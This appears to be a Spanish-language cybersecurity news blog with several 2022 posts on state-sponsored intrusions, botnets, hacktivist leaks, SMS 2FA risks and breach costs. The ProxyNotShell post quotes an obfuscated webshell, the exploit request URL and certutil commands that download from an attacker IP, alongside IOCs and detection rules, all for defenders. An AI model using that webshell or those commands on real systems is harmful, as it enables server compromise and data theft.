5 oct 2022

FBI, CISA, y NSA alerta sobre ataques a diferentes sistemas industriales

Las agencias de inteligencia y seguridad cibernética de EE.UU. revelaron que varios grupos de hacking de estados nacionales potencialmente se dirigieron a una "red empresarial de la organización del Sector de la Base Industrial de Defensa (DIB)" como parte de una campaña de espionaje cibernético.

"Los actores [de amenazas persistentes avanzadas] utilizaron un conjunto de herramientas de código abierto llamado Impacket para afianzarse en el entorno y comprometer aún más la red, y también utilizaron una herramienta de exfiltración de datos personalizada, CovalentStealer, para robar los datos confidenciales de la víctima", dijeron las autoridades.

El aviso conjunto, que fue escrito por la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), la Oficina Federal de Investigaciones (FBI) y la Agencia de Seguridad Nacional (NSA), dice que los adversarios probablemente tenían acceso a largo plazo al entorno comprometido.

Los hallazgos son el resultado de los esfuerzos de respuesta a incidentes de CISA en colaboración con una empresa de seguridad externa confiable desde noviembre de 2021 hasta enero de 2022. No atribuyó la intrusión a un actor o grupo de amenazas conocido.

También se desconoce el vector de infección inicial utilizado para violar la red, aunque se dice que algunos de los actores de APT obtuvieron una cabeza de playa digital para el servidor Microsoft Exchange del objetivo a mediados de enero de 2021.

Las actividades posteriores a la explotación en febrero implicaron una combinación de esfuerzos de reconocimiento y recopilación de datos, el último de los cuales resultó en la exfiltración de información confidencial relacionada con el contrato. También se implementó durante esta fase la herramienta Impacket para establecer la persistencia y facilitar el movimiento lateral.

Un mes después, los actores de APT explotaron las fallas de ProxyLogon en Microsoft Exchange Server para instalar 17 shells web de China Chopper e HyperBro, una puerta trasera utilizada exclusivamente por un grupo de amenazas chino llamado Lucky Mouse (también conocido como APT27, Bronze Union, Budworm o Emissary Panda).

Los intrusos, desde finales de julio hasta mediados de octubre de 2021, emplearon además una variedad de malware a medida llamada CovalentStealer contra la entidad sin nombre para desviar documentos almacenados en archivos compartidos y cargarlos en una carpeta en la nube de Microsoft OneDrive.

Se recomienda a las organizaciones que supervisen los registros en busca de conexiones de VPN inusuales, uso de cuentas sospechosas, uso de línea de comandos anómalo y malicioso conocido, y cambios no autorizados en las cuentas de usuario.

Fuente: THN

3 oct 2022

Chaos: botnet multiplataforma infecta Linux, Windows y FreeBSD

Los investigadores han revelado una pieza de malware multiplataforma nunca antes vista que ha infectado una amplia gama de dispositivos Linux y Windows, incluidos routers de oficinas pequeñas, equipos con FreeBSD y servidores de grandes empresas.

Black Lotus Labs, el brazo de investigación de la firma de seguridad Lumen, llama al malware Chaos, una palabra que aparece repetidamente en los nombres de funciones, certificados y nombres de archivos que utiliza. Chaos surgió a más tardar el 16 de abril, cuando el primer grupo de servidores de C&C se puso en marcha in-the-wild. Desde junio hasta mediados de julio, los investigadores encontraron cientos de direcciones IP únicas que representan dispositivos Chaos comprometidos. Los servidores de prueba utilizados para infectar nuevos dispositivos se han multiplicado en los últimos meses, pasando de 39 en mayo a 93 en agosto. A partir del martes, el número llegó a 111.

Black Lotus ha observado interacciones con estos servidores provisionales tanto desde dispositivos Linux integrados como desde servidores empresariales, incluido uno en Europa que albergaba una instancia de GitLab. Hay más de 100 muestras únicas en la naturaleza.

"La potencia del malware Chaos se deriva de algunos factores", escribieron los investigadores de Black Lotus Labs en una publicación de blog. "Primero, está diseñado para funcionar en varias arquitecturas, incluidas: ARM, Intel (i386), MIPS y PowerPC, además de los sistemas operativos Windows y Linux. Segundo, a diferencia de las redes de bots de distribución de ransomware a gran escala como Emotet que aprovechan el spam para propagarse y crecer, Chaos se propaga a través de CVE conocidos y claves SSH robadas por fuerza bruta".

Los CVEs mencionados en el informe del miércoles incluyen dispositivos de Huawei (CVE-2017-17215), Zyxel (CVE-2022-30525) y F5 (CVE-2022-1388). Esta última es una vulnerabilidad extremadamente grave (9.8) en balanceadores de carga, firewalls y equipos de inspección de red vendidos por F5. Las infecciones de SSH que utilizan fuerza bruta de contraseñas y claves robadas también permiten que Chaos se propague de una máquina a otra dentro de una red infectada.

Chaos también tiene varias capacidades, incluida la enumeración de todos los dispositivos conectados a una red infectada, la ejecución de shells remotos que permiten a los atacantes ejecutar comandos y la carga de módulos adicionales. Combinadas con la capacidad de ejecutarse en una gama tan amplia de dispositivos, estas capacidades han llevado a Black Lotus Labs a sospechar que "Chaos es obra de un actor que está creando una red de dispositivos infectados para aprovechar el acceso inicial, los ataques DDoS y la minería de criptomonedas".

Black Lotus Labs cree que Chaos es una rama de Kaiji, una botnet para servidores AMD e i386 basados ​​en Linux para realizar ataques DDoS. Desde su creación, Chaos ha adquirido una gran cantidad de nuevas características, incluidos módulos para nuevas arquitecturas, la capacidad de ejecutarse en Windows y la capacidad de propagarse a través de la explotación de vulnerabilidades y la recopilación de claves SSH.

Las direcciones IP infectadas indican que las infecciones de Chaos están más concentradas en Europa, con puntos de acceso más pequeños en América del Norte y del Sur y Asia-Pacífico.

Durante las primeras semanas de septiembre, nuestro emulador de host Chaos recibió múltiples comandos DDoS dirigidos a aproximadamente dos docenas de dominios o direcciones IP de organizaciones.

Las dos cosas más importantes que las personas pueden hacer para prevenir las infecciones de Chaos son mantener todos los routers, servidores y otros dispositivos completamente actualizados y usar contraseñas seguras y autenticación multifactor basada en FIDO2 siempre que sea posible.

Un recordatorio para los propietarios de routers de pequeñas oficinas en todas partes: "la mayoría del malware de routers no puede sobrevivir a un reinicio". Considere reiniciar su dispositivo al menos una vez por semana. Aquellos que usan SSH siempre deben usar una clave criptográfica para la autenticación.

Fuente: ArsTechnica

2 oct 2022

Robo de datos de #SEDENA (Secretaría de la Defensa Nacional en México) no fue el primero

El grupo Guacamaya, del que en días previos se reveló que había robado 6 TB de archivos a la Secretaría de Defensa Nacional (SEDENA) luego de realizar un ataque cibernético, ha dado a conocer algunos detalles adicionales sobre el hackeo. Previamente el grupo ya se había hecho responsable de divulgar 10T de datos de diferentes países de Latinoamérica.

Lo primero que el grupo señala en su blog y en DDoSecrets, es que algunos de los documentos de la SEDENA se encuentran disponibles públicamente, pero también apuntan a que no son los únicos atacantes que ingresaron a los servidores de la Secretaría, puesto que encontraron evidencias de que alguien más tenía acceso desde principios de julio.

Tal y cómo detalla Xataka en otra publicación, antes Guacamaya utilizó la vulnerabilidad ProxyShell en Microsfot Exchange, lo que permitió ejecutar código en un servidor de forma remota para acceder a varias documentaciones, pero en el caso específico de la SEDENA, se aprovechó una de antigua vulnerabilidadde Zimbra, un software para correos electrónicos y de colaboración utilizado principalmente para leer y escribir mensajes, sincronizar contactos, así como calendarios y documentos.

Este programa tenía dos vulnerabilidades descubiertas en 2022 (CVE-2022-27925 y CVE-2022-37042), mismas que afectaban únicamente a la versión de pago del servicio, que permitían a un atacante ingresar por el puerto de administrador por defecto, obtener sus privilegios y escribir archivos en el servidor, permitiendo ejecutar comandos en sistemas sin parches.

El grupo menciona que explotando esta vulnerabilidad, y luego de subir una webshell, pudieron descargar todos los correos en el directorio deseado. Incluso señalan que "en el servidor de la SEDENA había otros scripts malintencionados, algunos con fecha del 5 de julio", además de que encontraron evidencia de que otros atacantes también estuvieron descargando la documentación.

Por último, Guacamaya detalla que su intención es que más personas tuvieran acceso a la información, pero su difusión representa un riesgo para mucha gente si llega a manos equivocadas.

No obstante, el grupo está otorgando esta información sin cobrar por ella, siempre y cuando se les solicite directamente, pero antes se debe identificar plenamente a la persona que desea la documentación, explicar sus propósitos con los datos, además de dar detalles sobre cómo se difundiría, si esa es la intención.

Fuente: XATAKA

30 sept 2022

#ProxyNoShell: Vulnerabilidades Zero-Day en Exchange, utilizada in-the-wild

Aproximadamente a principios de agosto de 2022, mientras realizaba servicios de monitoreo de seguridad y respuesta a incidentes, el equipo de GTSC SOC descubrió que se estaba Microsoft Exchange 2013, 2016, 2019 on-prem e híbridas.

Durante la investigación, los expertos del GTSC Blue Team determinaron que el ataque utilizó una vulnerabilidad Zero-Day, por lo que inmediatamente se elaboró ​​un plan de contención temporal. Al mismo tiempo, los expertos de Red Team comenzaron a investigar y depurar el código descompilado de Exchange para encontrar la vulnerabilidad y explotar el código.

La vulnerabilidad resulta tan crítica que permite al atacante realizar RCE en el sistema comprometido. GTSC envió la vulnerabilidad a Zero Day Initiative (ZDI) de inmediato para trabajar con Microsoft para que se pudiera preparar un parche lo antes posible. ZDI verificó y reconoció 2 errores, cuyos puntajes CVSS son ZDI-CAN-18333 (8.8) y ZDI-CAN-18802 (6.3).

Las vulnerabilidades están siendo rastreadas por Microsoft como CVE-2022–41040 y CVE-2022–41082:

  • CVE-2022-41040 (8.8): It is a server-side request forgery (SSRF) vulnerability.
  • CVE-2022-41082 (8.8): Allows remote code execution (RCE) if the attacker has access to PowerShell

GTSC confirmó que otros sistemas también estaban siendo atacados con esta vulnerabilidad de día cero. Para ayudar a la comunidad a detener temporalmente el ataque antes de que esté disponible un parche oficial de Microsoft, publicaron este artículo dirigido a aquellas organizaciones que utilizan el sistema de correo electrónico de Microsoft Exchange.

 Información de vulnerabilidad

Para explotar esta vulnerabilidad se necesita un usuario autenticado. Inicialmente se detectan solicitudes de explotación en los registros de IIS con el mismo formato que la vulnerabilidad de ProxyShell. Incluso a esta vulnerabilidad Kevin Beaumont la está llamando ProxyNOTShell.

autodiscover/[email protected]/&Email=autodiscover/autodiscover.json%[email protected]

Luego, el atacante puede ejecutar comandos en el sistema atacado, acceder a un componente en el backend de Exchange y ejecutar un RCE. Aún NO se han publicado detalles técnicos de la vulnerabilidad.

Las mitigaciones son similares a ProxyShell:

Actividades posteriores a la explotación

Después de ejecutar el exploit, se registran ataques para recopilar información y crear un punto de apoyo en el sistema de la víctima. El equipo de ataque también utilizó varias técnicas para crear puertas traseras en el sistema afectado y realizar movimientos laterales a otros servidores del sistema.

Se han detectacto webshells, en su mayoría ofuscados, que se subian en los servidores de Exchange. El atacante utiliza Antsword, una herramienta china de código abierto que admite la administración de webshell.

<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+
''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+
char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).
GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+
'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

Otra característica notable es que el atacante también cambia el contenido del archivo RedirSuiteServiceProxy.aspx (nombre de archivo legítimo disponible en el servidor de Exchange) por el contenido de la webshell.

Además de recopilar información sobre el sistema, el atacante descarga archivos y verifica las conexiones a través de certutil, otra herramienta legítima de Windows.

“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]
"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Cabe señalar que cada comando termina con la cadena echo [S]&cd&echo [E], que es una de las firmas de China Chopper webshell.

Además, el delincuente también inyecta archivos DLL maliciosos en la memoria, coloca archivos sospechosos en los servidores atacados y ejecuta estos archivos a través de WMIC.

A continuación se presentan los indicadores de compromiso detectados (IOCs)

HASH

  • 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82
  • 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9
  • 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0
  • 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3
  • c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
  • c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
  • 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
  • c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
  • be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
  • 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP/URL:

  • 125[.]212[.]220[.]48
  • 5[.]180[.]61[.]17
  • 47[.]242[.]39[.]92
  • 61[.]244[.]94[.]85
  • 86[.]48[.]6[.]69
  • 86[.]48[.]12[.]64
  • 94[.]140[.]8[.]48
  • 94[.]140[.]8[.]113
  • 103[.]9[.]76[.]208
  • 103[.]9[.]76[.]211
  • 104[.]244[.]79[.]6
  • 112[.]118[.]48[.]186
  • 122[.]155[.]174[.]188
  • 125[.]212[.]241[.]134
  • 185[.]220[.]101[.]182
  • 194[.]150[.]167[.]88
  • 212[.]119[.]34[.]11
  • 137[.]184[.]67[.]33
  • hxxp://206[.]188[.]196[.]77:8080/themes.aspx

Prevención y mitigación

Como medida temporal (confirmada por Microsoft), y mientras se espera por el parche oficial por parte de Microsoft, se recomienda añadir una regla de bloqueo en el módulo URL Rewrite Rule de IIS.

NOTA: En SO menores a Windows Server 2016, es necesario instalar KB2999226 para que el IIS Rewrite Module 2.1 funcione.

  1. En «Autodiscover» en «FrontEnd» seleccione la pestaña «URL Rewrite» y luego «Request Blocking».
  2. Agregue la siguiente cadena en «URL Path»: ".*autodiscover\.json.*\@.*Powershell.*" (sin comillas)
  3. Actualización 04/10: agregue la siguiente cadena en «URL Path»: ".*autodiscover\.json.*Powershell.*" (sin comillas)
  4. En «Condition» cambie {URL} por {REQUEST_URI}.
  5. En «Using» marcar «Regular Expressions».

La publicación de Microsoft sobre Web Shell Threat Hunting con Microsoft Sentinel también proporciona una guía válida para buscar web shells en general.

Para ayudar a las organizaciones a verificar si sus servidores Exchange ya han sido explotados por este error, GTSC ha publicado una guía y una herramienta para escanear archivos de registro de IIS (almacenados de manera predeterminada en la carpeta %SystemDrive%\inetpub\logs\LogFiles):

Usar powershell:

Get-ChildItem -Recurse -Path  -Filter "*.log" |
    Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200'

O, se puede ejecutar la herramienta desarrollada para la detección de esta vulnerabilidad:

Los clientes de Microsoft Exchange Online no necesitan realizar ninguna acción. Los clientes locales de Microsoft Exchange deben revisar y aplicar las instrucciones de reescritura de URL previas. Microsoft ha publicado un script (version 22.10.03.1829) para aplicar estas mitigaciones contra la vulnerabilidad SSRF CVE-2022-41040. Este script requiere PowerShell 3+ y permisos de Administrador sobre IIS 7.5+.

La empresa también ha confirmado que las instrucciones de reescritura de URL discutidas públicamente pueden romper las cadenas de ataque actuales.

Como medidas de prevención adicionales, la compañía insta a las empresas a aplicar la autenticación multifactor (MFA ), deshabilitar la autenticación heredada y educar a los usuarios sobre cómo no aceptar solicitudes inesperadas de autenticación de dos factores (2FA).

De acuerdo a Shodan (otro), actualmente puede haber más de 200.000 servidores potencialmente expuestos. Se puede realizar la búsqueda como http.component:"outlook web app" y filtrar por ORG:"nombre_empresa" o por SSL:"*nombre*".

Actualización 02/10

  • Recomendamos enfáticamente a los clientes de Exchange Server que deshabiliten el acceso remoto a PowerShell para usuarios que no sean administradores en su organización. La guía sobre cómo hacer esto para un solo usuario o múltiples usuarios está aquí.
  • Se actualizó la sección detección de las las vulnerabilidades de Exchange CVE-2022-41040 y CVE-2022-41082.
  • Germán Fernández (aka @1ZRR4H) ha publicado un script NMAP para la detección de la vulnerabilidades.

Actualización 04/10

El investigador de seguridad Jang en un tweet de hoy muestra que la solución temporal de Microsoft para prevenir la explotación de CVE-2022-41040 y CVE-2022-41082 no es eficiente y se puede eludir con poco esfuerzo. Will Dormann, analista senior de vulnerabilidades de ANALYGENCE, está de acuerdo (video)con el hallazgo y dice que la '@' en el bloque de URL de Microsoft "parece innecesariamente preciso y, por lo tanto, insuficiente". Por eso la cadena original se ha modificado a .*autodiscover\.json.*Powershell.*

Muchas organizaciones tienen una configuración híbrida que combina la implementación local con la nube de Microsoft Exchange y deben comprender que también son vulnerables.

En un video de hoy, el investigador de seguridad Kevin Beaumont advierte que mientras haya una implementación de Exchange Server en las instalaciones, la organización está en riesgo.

Fuentes: GTSC | Microsoft

Más información:

29 sept 2022

Los SMS son la forma "más vulnerable" de verificación en dos pasos [CertiK]

El nivel de seguridad que proporcionan los SMS palidece en comparación con los autentificadores o las claves de seguridad físicas, afirma Jesse Leclere, de CertiK, en una entrevista.

El uso de SMS como una forma de autenticación de dos factores siempre ha sido popular entre los entusiastas de las criptomonedas. Después de todo, muchos usuarios ya comercian con sus criptomonedas o gestionan páginas sociales en sus teléfonos, así que ¿por qué no utilizar simplemente los SMS para verificar cuando se accede a contenido financiero sensible?

Desgraciadamente, los estafadores se han dado cuenta últimamente de que pueden explotar la riqueza enterrada bajo esta capa de seguridad a través del intercambio de SIM, o el proceso de redirigir la tarjeta SIM de una persona a un teléfono que está en posesión de un atacante. En muchas jurisdicciones de todo el mundo, los empleados de telecomunicaciones no piden identificación gubernamental, ni facial, ni números de la seguridad social para gestionar una simple solicitud de portabilidad.

Combinado con una rápida búsqueda de información personal disponible públicamente (bastante común para los interesados en la Web 3.0) y preguntas de recuperación fáciles de adivinar, los suplantadores pueden portar rápidamente el 2FA por SMS de una cuenta a su teléfono y empezar a utilizarlo con fines nefastos. A principios de este año, muchos youtubers de criptomonedas fueron víctimas de un ataque de intercambio de SIM en el que los atacantes publicaron vídeos de estafa en su canal con un texto que dirigía a los espectadores a enviar dinero a la billetera del atacante. En junio, el proyecto de NFT de Solana, Duppies, sufrió una violación de su cuenta oficial de Twitter a través de un intercambio de SIM en el que los atacantes tuiteaban enlaces a una falsa casa de la moneda.

Con respecto a este asunto, Cointelegraph habló con el experto en seguridad de CertiK, Jesse Leclere. Conocido como líder en el espacio de seguridad de blockchain, CertiK ha ayudado a más de 3.600 proyectos a asegurar activos digitales por valor de USD 360.000 millones y ha detectado más de 66.000 vulnerabilidades desde 2018. Esto es lo que dijo Leclere:

"La 2FA por SMS es mejor que nada, pero es la forma más vulnerable de 2FA que se utiliza actualmente. Su atractivo radica en su facilidad de uso: la mayoría de la gente está en su teléfono o lo tiene a mano cuando se conecta a las plataformas online. Pero no hay que subestimar su vulnerabilidad a los intercambios de tarjetas SIM".

Leclerc explicó que las aplicaciones dedicadas a la autenticación, como Google Authenticator, Authy o Duo, ofrecen casi toda la comodidad de las 2FA por SMS al tiempo que eliminan el riesgo del intercambio de SIM. A la pregunta de si las tarjetas virtuales o eSIM pueden eliminar el riesgo de ataques de phishing relacionados con el intercambio de SIM, Leclerc respondió claramente que no:

"Hay que tener en cuenta que los ataques de intercambio de SIM se basan en el fraude de identidad y la ingeniería social. Si un agente malicioso puede engañar a un empleado de una empresa de telecomunicaciones para que piense que es el propietario legítimo de un número vinculado a una SIM física, también puede hacerlo con una eSIM".

Aunque es posible disuadir este tipo de ataques bloqueando la tarjeta SIM en el teléfono (las compañías de telecomunicaciones también pueden desbloquear los teléfonos), Leclere señala que el estándar de oro es el uso de llaves de seguridad físicas. "Estas llaves se conectan al puerto USB del ordenador, y algunas están habilitadas para la comunicación de campo cercano (NFC) para facilitar su uso con dispositivos móviles", explica Leclere. "Un atacante necesitaría no solo conocer tu contraseña, sino apoderarse físicamente de esta llave para poder entrar en tu cuenta".

Leclere señala que después de ordenar el uso de las claves de seguridad para los empleados en 2017, Google ha experimentado cero ataques de phishing con éxito. "Sin embargo, son tan eficaces que si pierdes la única llave que está vinculada a tu cuenta, lo más probable es que no puedas volver a acceder a ella. Es importante mantener varias llaves en lugares seguros", añadió.

Por último, Leclere afirma que, además de utilizar una aplicación de autenticación o una clave de seguridad, un buen gestor de contraseñas facilita la creación de contraseñas fuertes sin reutilizarlas en varios sitios. "Una contraseña fuerte y única combinada con un 2FA no SMS es la mejor forma de seguridad para las cuentas", afirmó.

Fuente: CoinTelegraph

27 sept 2022

Los consumidores pagan el precio de las filtraciones de datos [IBM]

IBM Security publicó su informe anual Cost of a Data Breach Report 2022, que revela que las filtraciones de datos son más costosas y tienen mayor impacto que nunca, con un costo promedio de USD 2.09 millones de dólares en América Latina, el mayor costo en la historia del informe para las organizaciones encuestadas.

En la región, con un aumento de los costos por filtraciones de datos de casi un 15% comparado con el año anterior, los hallazgos sugieren que estos incidentes también pueden estar contribuyendo al aumento de los precios en bienes y servicios. De hecho, el 60% de las organizaciones a nivel global incrementaron los precios de sus productos o servicios debido a una filtración, en un momento en el que el costo de los bienes ya se está disparando en todo el mundo por la inflación, los problemas de la cadena de suministro, entre otros.

Por otro lado, el tiempo promedio en la región para identificar y contener una filtración de datos fue de 331.5 días en 2022, una reducción de casi 25 días en comparación con el año anterior. Además, la perpetuidad de los ciberataques también está arrojando luz sobre el “efecto perseguidor” que las filtraciones de datos están teniendo en las empresas, ya que el informe de IBM revela que el 83% de las organizaciones a nivel mundial experimentaron más de una filtración de datos en su vida.

Por duodécimo año consecutivo, los participantes de la industria de salud sufrieron las filtraciones más costosas de todos los sectores a nivel mundial, seguida por los servicios financieros. En América Latina, las industrias que observaron el mayor costo por registro en una filtración son salud (USD 128), servicios financieros (USD 124) y el sector servicios (USD 111).

Además, el 45% de las empresas en América Latina tienen un nivel de adopción maduro de Zero Trust (enfoque de Confianza Cero). Esta estrategia es importante ya que, globalmente, entre las organizaciones con una implementación madura de Zero Trust en su arquitectura de seguridad y aquellas que recién están comenzando, la diferencia de costos en la filtración fue de más de USD 1.5 millones de dólares.

El informe "Cost of a Data Breach 2022" -patrocinado y analizado por IBM Security, realizado por Ponemon Institute- se basa en un análisis en profundidad de las filtraciones de datos reales experimentadas por 550 organizaciones a nivel mundial -66 empresas de América Latina- entre marzo de 2021 y marzo de 2022.

Infraestructura crítica

  • El ransomware y los ataques destructivos representaron el 28% de las filtraciones en las organizaciones de infraestructuras críticas estudiadas, lo que pone de manifiesto que los atacantes buscan fracturar las cadenas de suministro globales que son la columna vertebral de la economía.
  • El costo global promedio de una filtración de datos para estas organizaciones fue de USD 4.82 millones de dólares, mayor que el promedio mundial (USD 4.35 millones de dólares).
  • Casi el 80% de las organizaciones de infraestructuras críticas no adoptaron estrategias Zero Trust, por lo que el costo medio de las filtraciones de datos aumenta hasta los USD 5.4 millones de dólares, un incremento de 24% en comparación con las que sí lo hacen.
  • Además, en el 17% de las infracciones, un socio comercial se vio inicialmente comprometido, lo que pone de manifiesto los riesgos de seguridad que plantean los entornos de confianza excesiva.

No es rentable pagar el rescate:

  • Las víctimas del ransomware del estudio que optaron por pagar el rescate sólo vieron una disminución de USD 630.000 dólares en el costo promedio de la filtración en comparación con aquellas que no lo hicieron, sin incluir el costo del rescate.
  • Si se tiene en cuenta el elevado precio de los rescates (mayor a USD 800.000 dólares), el costo financiero puede ser aún mayor, lo que sugiere que la acción de pagar el rescate, por si sola, no es una estrategia eficaz; mientras que además podrían estar financiando inadvertidamente futuros ataques con el capital que sería útil para esfuerzos de corrección y recuperación, e incluso se podría incurrir en posibles delitos federales.
  • IBM Security X-Force descubrió que la duración de los ataques de ransomware descendió 94% en los últimos 3 años -pasó de 2 meses a menos de 4 días- por lo que los equipos de seguridad tienen menos margen de acción.
  • En el caso de filtraciones de datos causadas por ransomware y ataques destructivos, el tiempo promedio para identificar y contener es significativamente mayor que la media global. Para un ransomware fue de 49 días más y en ataques destructivos fue de 47 días más, frente al promedio global de 277 días.

Factores y vectores en la filtración de datos:

  • Las credenciales comprometidas continúan siendo la causa más común de una filtración (19%), con un costo promedio de USD 4.5 millones de dólares. También tienen el ciclo de vida más largo: 327 días para identificar y contener.
  • El phishing fue la segunda (16%) y la más costosa, con un promedio de USD 4.91 millones de dólares en las organizaciones estudiadas. BEC (Business Email Compromise) alcanza 6% y es la segunda causa más costosa con USD 4.89 millones de dólares.
  • Tres factores principales que amplifican el costo de la filtración: complejidad del sistema de seguridad, migración a la nube y fallas de compliance.
  • Tres principales mitigadores de costos: uso de plataforma de Inteligencia Artificial para seguridad, DevSecOps y formación del equipo de Respuesta a Incidentes.

Profesionales, Automatización e IA en seguridad son clave para el ahorro de costos multimillonarios:

  • Las organizaciones que desplegaron completamente la automatización y la IA en seguridad incurrieron en un costo promedio menor y lograron un ahorro de 65.2% frente a las que no -el mayor ahorro de costos observado en el estudio. Además su tiempo de detección y contención es menor: 2.5 meses más rápido.
  • El 62% de las organizaciones admitió no tener suficiente personal para cubrir las necesidades relacionadas con la seguridad, lo que se traduce en una media de USD 550.000 dólares más en costos de filtraciones frente a las que sí cuentan con los recursos profesionales.
  • El 73% de las empresas tiene planes de Respuesta a Incidentes, pero el 37% no lo prueba regularmente. Se observa un ahorro del 58% en costo promedio por filtración de datos para las organizaciones que tienen equipo de Respuesta a Incidentes y prueban periódicamente su plan.
  • El 44% de las organizaciones utilizan tecnologías XDR (Extended Detection and Response) y acortaron el ciclo de vida de las filtraciones en casi un mes. Además ahorraron una media de USD 400.000 dólares.

Ventaja de la nube híbrida:

  • Un significativo 43% de las organizaciones estudiadas están en las primeras etapas o no han empezado a aplicar prácticas de seguridad para proteger sus entornos de nube.
  • Ahorro y Rapidez. Las empresas con entornos maduros de seguridad en la nube ahorraron 16% en el costo promedio para las filtraciones de datos. Además, son capaces de detectar y contener más rápido: 40 días menos que el promedio global.
  • Las empresas que adoptaron la nube híbrida notaron costos menores (USD 3.8 millones de dólares en promedio) en comparación con aquellas con un modelo de nube exclusivamente pública (USD 5.02 millones de dólares) o privada (USD 4.24 millones de dólares).
  • De hecho, las organizaciones con un entorno de nube híbrida fueron capaces de identificar y contener las filtraciones de datos 15 días más rápido que la media global de 277 días.

"Las empresas necesitan poner sus sistemas de seguridad a la ofensiva y vencer a los atacantes. Es hora de impedir que el adversario consiga sus objetivos y empezar a minimizar el impacto de los ataques. Cuanto más intenten las empresas perfeccionar su perímetro en lugar de invertir en la detección y la respuesta, mayor será el número de filtraciones de datos que pueden provocar aumentos en el costo de vida", comentó Charles Henderson, Director Global de IBM Security X-Force. "Este informe muestra que las estrategias correctas y las tecnologías adecuadas pueden ayudar a marcar la diferencia cuando las empresas son atacadas".

Fuente: DiarioTI

26 sept 2022

Guacamaya: grupo responsable de divulgar 10T de datos de diferentes países de Latinoamérica

Conocido como Guacamaya, este grupo de delincuentes informáticos supuestamente es el responsable de filtrar cerca de 10 Terabytes de correos electrónicos de organizaciones militares y policiales en varios países de Centro y Sudamérica, incluido uno del Estado Mayor Conjunto (EMCO) de las Fuerzas Armadas de Chile. La filtración contiene 400.000 correos electrónicos del Ministerio de Defensa.

"Filtramos sistemas militares y policiales de México, Perú, Salvador, Chile, Colombia y entregamos esto a quienes legítimamente hagan lo que puedan con estas informaciones. ", declaró el grupo, que preparó su acción en un operativo denominado "Fuerzas Represoras".

Según CyberScope, sitio especializado en ciberseguridad, esta filtración de datos es la última acción de Guacamaya, un grupo enfocado en infiltrarse en empresas mineras y petroleras, policías y diversas agencias reguladoras latinoamericanas desde marzo de 2022.

La filtración del grupo, que se hace llamar guacamaya por un ave nativa de América Central y del Sur, sigue un patrón de apuntar a entidades que el grupo cree que son responsables de la degradación ambiental del área y la supresión de las poblaciones nativas.

En agosto, Guacamaya publicó más de 2 terabytes de correos electrónicos y archivos de una gran cantidad de empresas mineras en Centro y Sudamérica.

Algunos de los datos filtrados son: Datos del Estado Mayor Conjunto de las Fuerzas Armadas de Chile, Comando General de las Fuerzas Armadas de Colombia, Policía Nacional Civil de El Salvador y Comando Conjunto de las Fuerzas Armadas de El Salvador, la Defensa Nacional Secretaría de México.

Por ejemplo, los materiales chilenos se publicaron en DDoSecrets, un sitio que aloja datos filtrados, publicando algunos directamente y compartiendo otros conjuntos más sensibles de interés público, con periodistas e investigadores, como en el caso del material restante. Este es el cuarto lanzamiento de Guacamaya desde marzo y todos los datos publicados están en Enlace Hacktivista, un sitio web dedicado a documentar la historia de estos delincuentes informáticos, compartir recursos educativos sobre seguridad de la información.

"Para que quede claro, los ejércitos militares y las fuerzas policiales de los Estados de Abya Yala, son la garantía de dominio del imperialismo norteamericano, son garantía de la presencia extractivista del Norte Global. Son fuerzas represoras violentas, criminales en contra de los propios pueblos y sus organigramas piramidales internos de poder también son repudiables.", dijo el grupo en un comunicado.

"Lo que realmente queremos, como nos advierte nuestra propia madre, es detener esto", dice el comunicado de Guacamaya. "Queremos que paren de una vez por todas, que paren la explotación, la minería, la contaminación, el afán de dominación".

Fuente: NationWorldNews | CyberScoop

Domain shadowing: creación de subdominios dañinos en dominios confiables

Los analistas de amenazas de Palo Alto Networks (Unit 42) descubrieron que el fenómeno de la "Domain shadowing" podría ser más frecuente de lo que se pensaba anteriormente, descubriendo 12.197 casos mientras escaneaban la web entre abril y junio de 2022.

"Domain shadowing" es una subcategoría del secuestro de DNS, donde los actores de amenazas comprometen el DNS de un dominio legítimo para alojar sus propios subdominios para usarlos en actividades maliciosas, pero no modifican las entradas de DNS legítimas que ya existen.

Luego, estos subdominios se utilizan para crear páginas maliciosas en los servidores de los ciberdelincuentes, mientras que las páginas web y los registros DNS del sitio del propietario del dominio permanecen sin cambios, y los propietarios no se dan cuenta de que han sido atacados y vulnerados.

Mientras tanto, los actores de amenazas son libres de alojar direcciones de C2 (Comando y Control), sitios de phishing y puntos de lanzamiento de malware, abusando de la buena reputación del dominio secuestrado para eludir los controles de seguridad.

En teoría, los atacantes pueden cambiar los registros DNS para atacar a los usuarios y propietarios de los dominios comprometidos, pero normalmente prefieren tomar el camino sigiloso descrito anteriormente.

Ataque difícil de detectar

Unit 42 explica que detectar casos reales de "Domain shadowing" es particularmente desafiante, lo que hace que la táctica sea muy atractiva para los perpetradores.

